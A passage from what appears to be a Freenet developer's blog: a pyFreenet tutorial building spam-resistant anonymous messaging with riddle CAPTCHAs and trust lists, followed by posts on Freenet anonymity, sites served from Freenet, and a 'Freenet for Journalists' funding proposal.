      timeout=360) # 6 minutes
print key
print n.get(key)[1]
n.shutdown()

Note that currently a colliding put – uploading where someone else uploaded before – simply stalls forever instead of failing. This is a bug in pyFreenet. We work around it by giving an explicit timeout.

But it’s clear how this can be spammed.

And it might already become obvious how this can be avoided.

KSK queue with CAPTCHA

Let’s assume I do not tell you a password. Instead I tell you where to find a riddle. The solution to that riddle is the password. Now only those who are able to solve riddles can upload there. And each riddle can be used only once. This restricts automated spamming, because it requires an activity of which we hope that only humans can do it reliably.

In the clearweb this is known as CAPTCHA. For the examples in this guide a plain text version is much easier.

import fcp
import uuid # avoid spamming the global namespace

n = fcp.node.FCPNode()
_uuid = str(uuid.uuid1())
_uuid2 = str(uuid.uuid1())
riddlekey = "KSK@" + _uuid
riddle =  """
What goes on four legs in the morning,                          
two legs at noon, and three legs in the                         
evening?
A <answer>
"""
# The ancient riddle of the sphinx
n.put(uri=riddlekey, data="""To reach me, answer this riddle.

%s

Upload your file to %s-<answer>
""" % (riddle, _uuid2),
      Global=True, persistence="forever",
      realtime=True, priority=1)

print n.get(riddlekey, realtime=True, priority=1)[1]
answer = "human"
print "answer:", answer
answerkey = "KSK@" + _uuid2 + "-%s" % answer

n.put(uri=answerkey, data="Hey, it's me!",
      Global=True, persistence="forever",
      realtime=True, priority=1)

print n.get(answerkey, realtime=True, priority=1)[1]
n.shutdown()

Now we have fully decentralized, spam-resistant, anonymous communication.

Let me repeat that: fully decentralized, spam-resistant, anonymous communication.

The need to solve a riddle everytime we want to write is not really convenient, but it provides the core of the feature we need. Everything we now add just makes this more convenient and makes it scale for many-to-many communication.

(originally I wanted to use the Hobbit riddles for this, but I switched to the sphinx riddle to avoid the swamp of multinational (and especially german) quoting restrictions)

Convenience: KSK queue with CAPTCHA via USK to reference a USK

The first step to improve this is getting rid of the requirement to solve a riddle every single time we write to a person. The second is to automatically update the list of riddles.

For the first, we simply upload a public USK key instead of the message. That gives a potentially constant stream of messages.

For the second, we upload the riddles to a USK instead of to a KSK. We pass out this USK instead of a password. Let’s realize this.

To make this easier, let’s use names. Alice wants to contact Bob. Bob gave her his USK. The answer-uuid we’ll call namespace.

import fcp
import uuid # avoid spamming the global namespace
import time # to check the timing

tstart = time.time()
def elapsed_time():
    return time.time() - tstart


n = fcp.node.FCPNode()

bob_public, bob_private = n.genkey(usk=True, name="riddles")
alice_to_bob_public, alice_to_bob_private = n.genkey(usk=True, name="messages")
namespace_bob = str(uuid.uuid1())
riddle =  """
What goes on four legs in the morning,                          
two legs at noon, and three legs in the                         
evening?
A <answer>
"""
print "prepared:", elapsed_time()
# Bob uploads the ancient riddle of the sphinx
put_riddle = n.put(uri=bob_private,
                   data="""To reach me, answer this riddle.

%s

Upload your key to %s-<answer>
""" % (riddle, namespace_bob),
                   Global=True, persistence="forever",
                   realtime=True, priority=1, async=True,
                   IgnoreUSKDatehints="true") # speed hack for USKs.

riddlekey = bob_public
print "riddlekey:", riddlekey
print "time:", elapsed_time()
# Bob shares the riddlekey. We're set up.

# Alice can insert the message before telling Bob about it.
put_first_message = n.put(uri=alice_to_bob_private,
                          data="Hey Bob, it's me, Alice!",
                          Global=True, persistence="forever",
                          realtime=True, priority=1, async=True,
                          IgnoreUSKDatehints="true")

print "riddle:", n.get(riddlekey, realtime=True, priority=1, followRedirect=True)[1]
print "time:", elapsed_time()

answer = "human"
print "answer:", answer
answerkey = "KSK@" + namespace_bob + "-%s" % answer
put_answer = n.put(uri=answerkey, data=alice_to_bob_public,
                   Global=True, persistence="forever",
                   realtime=True, priority=1, async=True)

print ":", elapsed_time()
# Bob gets the messagekey and uses it to retrieve the message from Alice

# Due to details in the insert process (i.e. ensuring that the file is
# accessible), the upload does not need to be completed for Bob to be
# able to get it. We just try to get it.
messagekey_alice_to_bob = n.get(answerkey, realtime=True, priority=1)[1]

print "message:", n.get(uri=messagekey_alice_to_bob, realtime=True, priority=1,
                        followRedirect=True, # get the new version
                        )[1]

print "time:", elapsed_time()
# that's it. Now Alice can upload further messages which Bob will see.

# Bob starts listening for a more recent message. Note that this does
# not guarantee that he will see all messages.
def next_usk_version(uri):
    elements = uri.split("/")
    elements[2] = str(abs(int(elements[2])) + 1)
    # USK@.../name/N+1/...
    return "/".join(elements)

next_message_from_alice = n.get(
    uri=next_usk_version(messagekey_alice_to_bob),
    realtime=True, priority=1, async=True,
    followRedirect=True) # get the new version

print "time:", elapsed_time()
# Alice uploads the next version.
put_second_message = n.put(uri=next_usk_version(alice_to_bob_private),
                           data="Me again!",
                           Global=True, persistence="forever",
                           realtime=True, priority=1,
                           IgnoreUSKDatehints="true",
                           async=True)

# Bob sees it.
print "second message:", next_message_from_alice.wait()[1]
print "time:", elapsed_time()

print "waiting for inserts to finish"
put_riddle.wait()
put_answer.wait()
put_first_message.wait()
put_second_message.wait()
print "time:", elapsed_time()

n.shutdown()

From start to end this takes less than 2 minutes minutes, and now Alice can send Bob messages with roughly one minute delay.

So now we set up a convenient communication channel. Since Alice already knows Bobs key, Bob could simply publish a bob-to-alice public key there, and if both publish GnuPG keys, these keys can be hidden from others: Upload not the plain key, but encrypt the key to Bob, and Bob could encrypt his bob-to-alice key using the GnuPG key from Alice. By regularly sending themselves new public keys, they could even establish perfect forward secrecy. I won’t implement that here, because when we get to the third part of this series, we will simply use the Freemail and Web of Trust plugin which already provide these features.

This gives us convenient, fully decentralized, spam-resistant, anonymous communication channels. Setting up a communication channel to a known person requires solving one riddle (in a real setting likely a CAPTCHA, or a password-prompt), and then the channel persists.

Note: To speed up these tests, I added another speed hack: IgnoreUSKDatehints. That turns off Date Hints, so discovering new versions will no longer be constant in the number of intermediate versions. For our messaging system that does not hurt, since we don’t have many intermediate messages we want to skip. For websites however, that could lead your visitors to see several old versions before they finally get the most current version. So be careful with this hack - just like you should with the other speed hacks.

But if we want to reach many people, we have to solve one riddle per person, which just doesn’t scale. To fix this, we can publish a list of all people we trust to be real people. Let’s do that.

Many-to-many: KSK->CAPTCHA->USK->USK which is linked in the original USK

To enable (public) many-to-many communication, we propagate the information that we believe that someone isn’t a spammer and add a blacklist to get rid of people who suddenly start to spam.

The big change with this scheme is that there is two-step authentication: Something expensive (solving a riddle) gets you seen by a few people, and if you then contribute constructively in a social context, they mark you as non-spammer and you get seen by more people.

The clever part about that scheme is that socializing is actually no cost to honest users (that’s why we use things like Sone or FMS), while it is a cost to attackers.

Let’s take Alice and Bob again, but add Carol. First Bob introduces himself to Alice, then Carol introduces herself to Alice. Thanks to propagating the riddle-information, Carol can directly write to Bob, without first solving a riddle. Scaling up that means that you only need to prove a single time that you are no spammer (or rather: not disruptive) if you want to enter a community.

To make it easier to follow, we will implement this with a bit of abstraction: People have a private key, can introduce themselves and publish lists of messages. Also they keep a public list of known people and a list of people they see as spammers who want to disrupt communication.

I got a bit carried away while implementing this, but please bear with me: It’ll work hard to make it this fun.

The finished program is available as alice_bob_carol.py. Just download and run it with python alice_bob_carol.py.

Let’s start with the minimal structure for any pyFreenet using program:

import fcp

n = fcp.node.FCPNode() # for debugging add verbosity=5

<<body>>

n.shutdown()

The body contains the definitions of a person with different actors, an update step (as simplification I use global stepwise updates) as well as the setup of the communication. Finally we need an event loop to run the system.

<<preparation>>

<<person>>

<<update>>

<<setup>>

<<event_loop>>

We start with some imports – and a bit of fun :)

import uuid
import random
try:
    import chatterbot # let's get a real conversation :)
    # https://github.com/guntherc/ChatterBot/wiki/Quick-Start
    # get with `pip install --user chatterbot`
    irc_loguri = "USK@Dtz9FjDPmOxiT54Wjt7JwMJKWaqSOS-UGw4miINEvtg,cuIx2THw7G7cVyh9PuvNiHa1e9BvNmmfTcbQ7llXh2Q,AQACAAE/irclogs/1337/"
    print "Getting the latest IRC log as base for the chatterbot"
    IRC_LOGLINES = n.get(uri=irc_loguri, realtime=True, priority=1, followRedirect=True)[1].splitlines()
    import re # what follows is an evil hack, but what the heck :)
    p = re.compile(r'<.*?>')
    q = re.compile(r'&.*?;')
    IRC_LOGLINES = [q.sub('', p.sub('', str(unicode(i.strip(), errors="ignore"))))
                    for i in IRC_LOGLINES]
    IRC_LOGLINES = [i[:-5] for i in IRC_LOGLINES # skip the time (last 5 letters)
                    if (i[:-5] and # skip empty
                        not "spam" in i # do not trigger spam-marking
                    )][7:] # skip header 
except ImportError:
    chatterbot = None

The real code begins with some helper functions – essentially data definition.

def get_usk_namespace(key, name, version=0):
    """Get a USK key with the given namespace (foldername)."""
    return "U" + key[1:] + name + "/" + str(version) + "/"

def extract_raw_from_usk(key):
    """Get an SSK key as used to identify a person from an arbitrary USK."""
    return "S" + (key[1:]+"/").split("/")[0] + "/"

def deserialize_keylist(keys_data):
    """Parse a known file to get a list of keys. Reverse: serialize_keylist."""
    return [i for i in keys_data.split("\n") if i]

def serialize_keylist(keys_list):
    """Serialize the known keys into a text file. Reverse: parse_known."""
    return "\n".join(keys_list)

Now we can define a person. The person is the primary actor. To keep everything contained, I use a class with some helper functions.

class Person(object):
    def __init__(self, myname, mymessage):
        self.name = myname
        self.message = mymessage
        self.introduced = False
        self.public_key, self.private_key = n.genkey()
        print self.name, "uses key", self.public_key
        # we need a list of versions for the different keys
        self.versions = {}
        for name in ["messages", "riddles", "known", "spammers"]:
            self.versions[name] = -1 # does not exist yet
        # and sets of answers, watched riddle-answer keys, known people and spammers.
        # We use sets for these, because we only need membership-tests and iteration.
        # The answers contain KSKs, the others the raw SSK of the person.
        # watched contains all persons whose messages we read.
        self.lists = {}
        for name in ["answers", "watched", "known", "spammers", "knowntocheck"]:
            self.lists[name] = set()
        # running requests per name, used for making all persons update asynchronously
        self.jobs = {}
        # and just for fun: get real conversations. Needs chatterbot and IRC_LOGLINES.
        # this is a bit slow to start, but fun. 
        try:
            self.chatbot = chatterbot.ChatBot(self.name)
            self.chatbot.train(IRC_LOGLINES)
        except:
            self.chatbot = None


    def public_usk(self, name, version=0):
        """Get the public usk of type name."""
        return get_usk_namespace(self.public_key, name, version)
    def private_usk(self, name, version=0):
        """Get the private usk of type name."""
        return get_usk_namespace(self.private_key, name, version)

    def put(self, key, data):
        """Insert the data asynchronously to the key. This is just a helper to
avoid typing the realtime arguments over and over again.

        :returns: a job object. To get the public key, use job.wait(60)."""
        return n.put(uri=key, data=data, async=True,
                     Global=True, persistence="forever",
                     realtime=True, priority=1,
                     IgnoreUSKDatehints="true")

    def get(self, key):
        """Retrieve the data asynchronously to the key. This is just a helper to
avoid typing the realtime arguments over and over again.

        :returns: a job object. To get the public key, use job.wait(60)."""
        return n.get(uri=key, async=True,
                     realtime=True, priority=1,
                     IgnoreUSKDatehints="true",
                     followRedirect=True)

    def introduce_to_start(self, other_public_key):
        """Introduce self to the other by solving a riddle and uploading the messages USK."""
        riddlekey = get_usk_namespace(other_public_key, "riddles", "-1") # -1 means the latest version
        try:
            self.jobs["getriddle"].append(self.get(riddlekey))
        except KeyError:
            self.jobs["getriddle"] = [self.get(riddlekey)]

    def introduce_start(self):
        """Select a person and start a job to get a riddle."""
        known = list(self.lists["known"])
        if known: # introduce to a random person to minimize
                  # the chance of collisions
            k = random.choice(known)
            self.introduce_to_start(k)

    def introduce_process(self):
        """Get and process the riddle data."""
        for job in self.jobs.get("getriddle", [])[:]:
            if job.isComplete():
                try:
                    riddle = job.wait()[1]
                except Exception as e: # try again next time
                    print self.name, "getting the riddle from", job.uri, "failed with", e
                    return
                self.jobs["getriddle"].remove(job)
                answerkey = self.solve_riddle(riddle)
                messagekey = self.public_usk("messages")
                try:
                    self.jobs["answerriddle"].append(self.put(answerkey, messagekey))
                except KeyError:
                    self.jobs["answerriddle"] = [self.put(answerkey, messagekey)]

    def introduce_finalize(self):
        """Check whether the riddle answer was inserted successfully."""
        for job in self.jobs.get("answerriddle", [])[:]:
            if job.isComplete():
                try:
                    job.wait()
                    self.jobs["answerriddle"].remove(job)
                    self.introduced = True
                except Exception as e: # try again next time
                    print self.name, "inserting the riddle-answer failed with", e
                    return

    def new_riddle(self):
        """Create and upload a new riddle."""
        answerkey = "KSK@" + str(uuid.uuid1()) + "-answered"
        self.lists["answers"].add(answerkey)
        self.versions["riddles"] += 1
        next_riddle_key = self.private_usk("riddles", self.versions["riddles"])
        self.put(next_riddle_key, answerkey)


    def solve_riddle(self, riddle):
        """Get the key for the given riddle. In this example we make it easy:
The riddle is the key. For a real system, this needs user interaction.
        """
        return riddle

    def update_info(self):
        for name in ["known", "spammers"]:
            data = serialize_keylist(self.lists[name])
            self.versions[name] += 1
            key = self.private_usk(name, version=self.versions[name])
            self.put(key, data)

    def publish(self, data):
        self.versions["messages"] += 1
        messagekey = self.private_usk("messages", version=self.versions["messages"])
        print self.name, "published a message:", data
        self.put(messagekey, data)

    def check_network_start(self):
        """start all network checks."""
        # first cancel all running jobs which will be replaced here.
        for name in ["answers", "watched", "known", "knowntocheck", "spammers"]:
            for job in self.jobs.get(name, []):
                job.cancel()
        # start jobs for checking answers, for checking all known people and for checking all messagelists for new messages.
        for name in ["answers"]:
            self.jobs[name] = [self.get(i) for i in self.lists[name]]
        for name in ["watched"]:
            self.jobs["messages"] = [self.get(get_usk_namespace(i, "messages")) for i in self.lists[name]]
        self.jobs["spammers"] = []
        for name in ["known", "knowntocheck"]:
            # find new nodes
            self.jobs[name] = [self.get(get_usk_namespace(i, "known")) for i in self.lists[name]]
            # register new nodes marked as spammers
            self.jobs["spammers"].extend([self.get(get_usk_namespace(i, "spammers")) for i in self.lists[name]])

    def process_network_results(self):
        """wait for completion of all network checks and process the results."""
        for kind, jobs in self.jobs.items():
            for job in jobs:
                if not kind in ["getriddle", "answerriddle"]:
                    try:
                        res = job.wait(60)[1]
                        self.handle(res, kind, job)
                    except:
                        continue

    def handle(self, result, kind, job):
        """Handle a successful job of type kind."""
        # travel the known nodes to find new ones
        if kind in ["known", "knowntocheck"]:
            for k in deserialize_keylist(result):
                if (not k in self.lists["spammers"] and
                    not k in self.lists["known"] and
                    not k == self.public_key):
                    self.lists["knowntocheck"].add(k)
                    self.lists["watched"].add(k)
                    print self.name, "found and started to watch", k
        # read introductions
        elif kind in ["answers"]:
            self.lists[kind].remove(job.uri) # no longer need to watch this riddle
            k = extract_raw_from_usk(result)
            if not k in self.lists["spammers"]:
                self.lists["watched"].add(k)
                print self.name, "discovered", k, "through a solved riddle"
        # remove found spammers
        elif kind in ["spammers"]:
            for k in deserialize_keylist(result):
                if not result in self.lists["known"]:
                    self.lists["watched"].remove(result)
        # check all messages for spam
        elif kind in ["messages"]:
            k = extract_raw_from_usk(job.uri)
            if not "spam" in result:
                if not k == self.public_key:
                    print self.name, "read a message:", result
                    self.chat(result) # just for fun :)
                    if not k in self.lists["known"]:
                        self.lists["known"].add(k)
                        self.update_info()
                        print self.name, "marked", k, "as known person"
            else:
                self.lists["watched"].remove(k)
                if not k in self.lists["spammers"]:
                    self.lists["spammers"].add(k)
                    self.update_info()
                    print self.name, "marked", k, "as spammer"


    def chat(self, message):
        if self.chatbot and not "spam" in self.message:
            msg = message[message.index(":")+1:-10].strip() # remove name and step
            self.message = self.name + ": " + self.chatbot.get_response(msg)

# some helper functions; the closest equivalent to structure definition
<<helper_functions>>

Note that nothing in here depends on running these from the same program. All communication between persons is done purely over Freenet. The only requirement is that there is a bootstrap key: One person known to all new users. This person could be anonymous, and even with this simple code there could be multiple bootstrap keys. In freenet we call these people “seeds”. They are the seeds from which the community grows. As soon as someone besides the seed adds a person as known, the seed is no longer needed to keep the communication going.

The spam detection implementation is pretty naive: It trusts people to mark others as spammers. In a real system, there will be disputes about what constitutes spam and the system needs to show who marks whom as spammer, so users can decide to stop trusting the spam notices from someone when they disagree. As example for a real-life system, the Web of Trust plugin uses trust ratings between -100 and 100 and calculates a score from the ratings of all trusted people to decide how much to trust people who are not rated explicitly by the user.

With this in place, we need the update system to be able to step through the simulation. We have a list of people who check keys of known other people.

We first start all checks for all people quasi-simultaneously and then check the results in serial to avoid long wait times from high latency. Freenet can check many keys simultaneously, but serial checking is slow.

people = []

def update(step):
    for p in people:
        if not p.introduced:
            p.introduce_start()
    for p in people:
        p.check_network_start()
    for p in people:
        if p.message:
            p.publish(p.name + ": " + p.message + "   (step=%s)" % step)
        p.new_riddle()
    for p in people:
        if not p.introduced:
            p.introduce_process()
    for p in people:
        p.process_network_results()
    for p in people:
        if not p.introduced:
            p.introduce_finalize()

So that’s the update tasks - not really rocket science thanks to the fleshed out Persons. Only two things remain: Setting up the scene and actually running it.

For setup: We have Alice, Bob and Carol. Lets also add Chuck who wants to prevent the others from communicating by flooding them with spam.

def gen_person(name):
    try:
        return Person(myname=name, mymessage=random.choice(IRC_LOGLINES))
    except:
        return Person(myname=name, mymessage="Hi, it's me!")

# start with alice
alice = gen_person("Alice")
people.append(alice)

# happy, friendly people
for name in ["Bob", "Carol"]:
    p = gen_person(name)
    people.append(p)

# and Chuck
p = Person(myname="Chuck", mymessage="spam")
people.append(p)

# All people know Alice (except for Alice).
for p in people:
    if p == alice:
        continue
    p.lists["known"].add(alice.public_key)
    p.lists["watched"].add(alice.public_key)

# upload the first version of the spammer and known lists
for p in people:
    p.update_info()

That’s it. The stage is set, let the trouble begin :)

We don’t need a while loop here, since we just want to know whether the system works. So the event loop is pretty simple: Just call the update function a few times.

for i in range(6):
    update(step=i)

That’s it. We have spam-resistant message-channels and community discussions. Now we could go on and implement more algorithms on this scheme, like the turn-based games specification (ever wanted to play against truly anonymous competitors?), Fritter (can you guess from its name what it is? :)), a truly privacy respecting dropbox or an anonymizing, censoriship resistant, self-hosting backend for a digital market like (the in 2023 long defunct) OpenBazaar.

But that would go far beyond the goal of this article – which is to give you, my readers, the tools to create the next big thing by harnessing the capabilities of Freenet.

These capabilities have been there for years, but hidden beneath non-existing and outdated documentation, misleading claims of being in alpha-stage even though Freenet has been used in what amounts to production for over a decade and, not to forget, the ever-recurring, ever-damning suggestion to SGTFS (second-guess the friendly source). As written in Forgotten Cypherpunk Paradise, Freenet already solved many problems which researchers only begin to tackle now, but there are reasons why it was almost forgotten. With this series I intend fix some of them and start moving Freenet documentation towards the utopian vision laid out in Teach, Don’t Tell. It’s up to you to decide whether I succeeded. If I did, it will show up as a tiny contribution to the utilities and works of art and vision you create.

Note that this is not fast (i.e. enough for blogging but not enough for chat). We can make it faster by going back to SSKs instead of USKs with their additional logic for finding the newest version in O(1), but for USK there are very cheap methods to get notified of new versions for large numbers of keys (subscribing) which are used by more advanced tools like the Web of Trust and the Sone plugin, so this would be an optimization we would have to revert later. With these methods, Sone reaches round trip times of 5-15 minutes despite using large uploads.

Also since this uses Freenet as backend, it scales up: If Alice, Bob, Carol und Chuck used different computers instead of running on my single node, their communication would actually be faster, and if they called in all their alphabet and unicode friends, the system would still run fast. We’re harvesting part of the payoff from using a fully distributed backend :)

And with that, this installment ends. You can now implement really cool stuff using Freenet. In the next article I’ll describe how to avoid doing this stuff myself by interfacing with existing plugins. Naturally I could have done that from the start, but then how could I have explained the Freenet communication primitives these plugins use? :)

If you don’t want to wait, have a look at how Infocalypse uses wot to implement github-like access with user/repo, interfaces with Freemail to realize truly anonymous pull-requests from the command line and builds on FMS to provide automated updates of a DVCS wiki over Freenet.

Happy Hacking!

PS: You might ask “What is missing?”. You might have a nagging feeling that something we do every day isn’t in there. And you’re right. It’s scalable search. Or rather: scalable, spam- and censorship-resistant search. Scalable search would be Gnutella. Spam-resistance would be Credence on the social graph (the people you communicate with). Censorship-resistant is unsolved – even Google fails there. But seeing that Facebook just overtook Google as the main source of traffic, we might not actually need fully global search. Together with the cheap and easy update notifications in Freenet (via USKs), a social recommendation and bookmark-sharing system should make scalable search over Freenet possible. And until then there’s always the decentralized YaCy search engine which has been shown to be capable of crawling Freenet. Also there are the Library and Spider plugins, but they need some love to work well. Also there are the Library and Spider plugins, but they need some love to work well.

PPS: You can download the final example as alice_bob_carol.py

Freenet Interview with Zilion

Zilion Web conducted an Interview about Freenet with me. Zilion asked interesting questions and I kind of went overboard in answering them. They include:

  • When did you become a freenet developer? Why?
  • Freenet has 18 years of continuous development, from here to there, how do you see your growth?
  • Frost vs. FMS, what is your choice and why?
  • What do you think about people who use Freenet just for illegal purposes? And what is your concept of freedom about that?
  • What to expect from the future in Freenet?
  • Can you tell us how Opennet and Darknet works, and its pros and cons?

To see the answers, just head over to the article:

Interview with Freenet Developer (ArneBab)
https://zilionweb.wordpress.com/2017/08/07/interview-with-freenet-developer-arnebab/

And do install Freenet and then connect confidentially to your friends to build the darknet one friend at a time.

Freenet anonymity: Best case and Worst case

As the i2p people say, anynomity is no boolean. Freenet allows you to take it a good deal further than i2p or tor, though. If you do it right.

  • Worst case: If all of Apple would want to find you, because you declared that you would post the videos of the new iDing - and already sent them your videos as teaser before starting to upload them from an Apple computer (and that just after they lost their beloved dictator), you might be in problems if you use Opennet. You are about as safe as with tor or i2p.

  • Best case: If a local politician would want to find you, after you uploaded proof that he takes bribes, and you uploaded the files to a new safe key (SSK) and used Freenet in Darknet-mode with connections only to friends who would rather die than let someone take over their computer, there’s no way in hell, you’d get found due to Freenet (the file data could betray you, or they could find you by other means, but Freenet won’t be your weak spot).

Naturally real life is somewhere in-between.

Things which improve anonymity a lot in the best case:

  • Don’t let others know the data you are going to upload before the upload finished (would allow some attacks).
  • Use only Darknet with trusted friends (Darknet means that you connect only to people you know personally. For that it is necessary to know other people who use Freenet).
  • Upload small files, so the time in which you are actively uploading is short.

Implied are:

  • Use an OS without trojans. So no Windows. (Note: Linux can be hacked, too, but it is far less likely to already have been compromised)
  • Use no Apple devices. You don’t control them yourself and can’t know what they have under the hood. (You are compromised from the time you buy them)
  • If you use Android, flash it yourself to give it an OS you control (Freenet is not yet available for Android. as of 2021, Freenet is available on Android via freenet-mobile/app).
  • Know your friends.

Important questions to ask:

  • Who would want to find you?
  • How much would they invest to find you?
  • Do they already try to monitor Freenet? (in that case uploading files with known content would be dangerous)
  • Do they already know you personally? If yes and if they might have already compromised your computer or internet connection, you can’t upload anything anonymously anywhere. In that case, never let stuff get onto your computer in the first place. Let someone else upload it, who is not monitored (yet).
  • Can they eavesdrop on your internet connection? Then they might guess that you use Freenet from the amount of encrypted communication you do and might want to bug your computer just in case you want to use Freenet against them some day. If you think they might have bugged your computer, the notes in the previous point apply.

See the Security Summary (mostly possible attacks) in the freenet wiki for details.

Freenet as backing store for sites on the clearnet (in use today)

Chris Double (bluishcoder) changed his main website to be served directly from Freenet:

Thanks to this, the same article is now available from my inproxy.

And, naturally, from Freenet:

USK@1ORdIvjL2H1bZblJcP8hu2LjjKtVB-rVzp8mLty~5N4,8hL85otZBbq0geDsSKkBK4sKESL2SrNVecFZz9NxGVQ,AQACAAE/bluishcoder/20/2015/09/14/using-freenet-for-static-websites.html

This makes the site secure against efforts to take it down, and even if the keys would get compromised, old editions would still be available as SSK.

Example: the article about using Freenet as backend in version 20 of the site

And not to forget: People can access it anonymously from Freenet.

Freenet for Journalists, funding proposal

This is a funding proposal I sent to Open Technology Fund to make Freenet suitable for Journalists and their sources. Sadly it got rejected, but maybe it helps future proposals.

Project name: Freenet for Journalists
Duration: 24 months
Amount: 800000
Contact name: Arne Babenhauserheide
Contact email: arne_bab -ät- web -punkt- de

Descriptors

  • Status: It's basically done. (Release)
  • Focus: Privacy enhancement
  • Objective(s): Advocacy, Technology development, Deploying technology, Training
  • Beneficiaries: General public, Sexual minorities, Activists, Journalists, Advocacy groups/NGOs, Technologists, Entrepreneurs
  • Addressed problems: Restrictive Internet filtering by technical methods (IP blocking, DNS filtering, TCP RST, DPI, etc.), Blocking, filtering, or modification of political, social, and/or religious content (including apps), Technical attacks against government critics, journalists, and/or human rights organizations (Cyberattacks), Physical intimidation, arrest, violence (including device seizure or destruction), and death for political or social reasons, Repressive surveillance or monitoring of communication, Policies, laws, or directives that increase surveillance, censorship, and punishment, Government practices that hold intermediaries (social networks or ISPs) liable for user content
  • Technology attributes: User interface/experience, Anonymity, Cryptography, Desktop client, Desktop App, Sensitive data, Networking
  • Region: Global

Project description

Freenet is the only tool to date which addresses all technical requirements for freedom of the press:

  • Confidential communication between sources and journalists while hiding that communication is taking place,
  • Keep journalists independent from large publishers (no need to secure a public server) and
  • Asynchronous usage for sources without exposing at any centralized place that Freenet is used.

However, despite providing the technical foundation for real freedom of the press, Freenet is much too hard to use. Solutions to its usability problems are known, but they need to be implemented, which requires considerable focused effort and coordination with journalists to ensure that the implemented solutions fit the requirements of journalists.

The Freenet for Journalists project is about this focused effort: Making the capabilities of Freenet usable for journalists and sources, so an employee at a military contractor who finds out about illegal activity no longer has to leave the country or rely on large media organizations before blowing the whistle (to stay safe from retribution of the employer).

Project how

Making Freenet easier to use for Journalists and whistleblowers requires technical work:

  • maintain journalist site seamlessly: Enhance the Freereader and Sharewiki plugins.
  • contact a journalist via the site easily: Increase the integration of the freemail plugin.
  • use a traceless persistent pseudonym (QR or written key), integrated seamlessly into the main interface.
  • one-click creation of a Freenet-stick for transient friend-to-friend connections: add connection over single-use tokens.
  • invisible connections (steganography): Finish and merge the pluggable transports branch.
  • grow the over android: Improve and expand the icicle app: http://loubo.co/icicle/
  • a minimal security review (we are in contact with security researchers).

Also it requires coordination with and training for journalists to ensure that the workflows we enable integrate well with their workflows.

To tackle this, we asked Asher Wolf, original organizer of the crypto parties, whether she would join the team as community coordinator and trainer if we get funding. She said she would join up (but we need to have funding first: she has a child to support). Also we will collaborate with Glyn Moody who has 30 years of experience in journalism.

To increase user adoption, this project will tackle the main issues we identified as limiting adoption:

  • mediocre user interface,
  • the friend-to-friend mode—one of the unique selling points of Freenet—isn’t actually enjoyable to use yet,
  • most useful features are not visible from the start and do not come pre-activated,
  • there is no working debian package.

We are confident that with a team of at least three developers and a community-coordinator and trainer, we can realize that within two years. Plans for this are already made and we have the people, all we need is sufficient funding so we can lay down our day jobs and focus on doing what we believe is needed to regain confidential communication in the digitalspace.

Project who

The project is for Journalists and their sources.

It will allow people who aren’t yet under targeted surveillance to contact journalists without exposing their identity. It does not matter whether the journalist is under targeted surveillance.

Freenet as leaking platform makes journalists independent from large infrastructure. Journalists often write for several publishers, but platforms like SecureDrop bind them to centralized communication. They are a single point of failure. The same is true for services using Tor to anonymize sources: Here the journalist must run a server which can withstand serious attacks.

In Freenet all nodes in the system collaborate to allow exchanging information confidentially and pseudonymously without making any node a central point of failure.

The core design principle of Freenet is providing Freedom of the Press, and all its features derive from that principle:

  • No censorship by threat: Pseudonymous publication with public/private key cryptography. And usage without leaving information that you use it at a known place: in the friend-to-friend mode Freenet only connects to people you know personally, while still providing a globally connected network in which you can access all content uploaded by all users. You can create a pseudonym and prove that all your articles are written by the same person.
  • No censorship by choking commmunication: Decentralized spam resistance (beyond mere captchas) and long lifetime for files which are actually accessed: Whether you are the Guardian or a local Indian journalist, your articles stay available as long as people read them.
  • No censorship by deleting information: If something has been uploaded into Freenet, it stays available as long as people access it regularly. All data is stored in encrypted chunks on the computers of its users. Those chunks can be reassembled using the public key, which is retrieved using the URL to the article someone wrote.

Project why

“There is now no shield from forced exposure…The foundation of Groklaw is over…the Internet is over” –Groklaw, Forced Exposure(2013-08-20)

The internet once broke the structural information control from the powerful and as such created the opportunity to strengthen democracy against existing concentrations of power. Total surveillance reverts this because it forces everyone to self-censor communication. There is no longer a way to communicate without exposing the physical identity to strong attackers. Even Tor users can be de-anonymized quickly, for example by breaking servers which provide the services.

Due to the pervasive infiltration of digital communication into day-to-day life, this affects analog communication more and more.

Other services like /TorChat/, /Signal/, /Globaleaks/ and /SecureDrop/ all require some degree of centralization and lack censorship-resistant anti-spam methods (Freenet already provides the latter, due to experiencing how anonymous communication breaks down when it lacks spam resistance). Additionally these other services contain vectors for censorship:

  • Signal relies on /centralized servers/.
  • Globaleaks and SecureDrop need to be run by an organization which can /keep dynamic websites secure on Tor/.
  • TorChat can be blocked for a journalist by /basic spamming/ — or by a targeted DoS attack.

Freenet on the other hand is designed for asynchronous communication (without requiring both participants to be online at the same time). It implements communication features on a decentralized anonymizing datastore built on a friend-to-friend structure. This avoids the problems inherent in other solutions.

Other information

All of Freenet is Free Software licensed under GPL-compatible licenses. You can find additional information onhttps://freenetproject.org

The financial administration is managed by Freenet Project Inc., a US-based 503(c) non-profit. The project is financed by donations, from other organizations and from regular users. This proposal is sent on behalf of the community. The funding plan is cleared not only with other developers but also with the users.

This proposal is written for 800.000$ because many experienced Freenet developers are based in Europe and we cannot predict the exchange rate between Euro and Dollar, so we need to leave some room to ensure that we can pay the salaries if the Euro should become stronger.

For somewhat confidential inquiries, contact press@freenetproject.org (these will not be posted in a public place).

You can contact us publicly by sending an email to devl@freenetproject.org or by joining the IRC channel #freenet @irc.freenode.net

My GnuPG/PGP key (for arne_bab -ät- web -punkt- de) is available from http://draketo.de/inhalt/ich/pubkey.txt with the fingerprint 6B05 41F0 94FF 2163 6FBA 2433 3307 469B FE96C404

Freenet currently is at a point where the technical backend is working well and provides features not found in any other program, while the user interface suffers from a large number of annoyances. Different from new projects which have been emerging in the past years, Freenet does not need uncertain research or large reshaping to be suitable for a situation of ubiquious surveillance. What it needs are improvements in workflows and integration. These are tasks which can be done without facing much uncertainty, but they need focused effort.

To ensure sustainability we will keep development infrastructure distributed: Freenet must not be dependent upon infrastructure we use for this project. Freenet will continue after the project ends, so the features developed during the project will stay available.

Freenet protects your DickPic!

Afraid that the NSA could steal your DickPic? Freenet to the rescue!

Freenet protects your DickPic!
(mirror via Freenet)

Don’t know what this is about?

Watch Edward Snowden reveal DickPic, the latest, most massive surveillance program from the NSA:

Thanks to John Oliver for one of the most awesome acts of journalism I’ve seen!

FAQ

Anonymous@lFG3mGbGf0b8nE6j8RC0i5ZgWEhsQXDG3ghkYIa-1wQ wrote :
I thought Freenet wasn’t able to protect against the NSA?

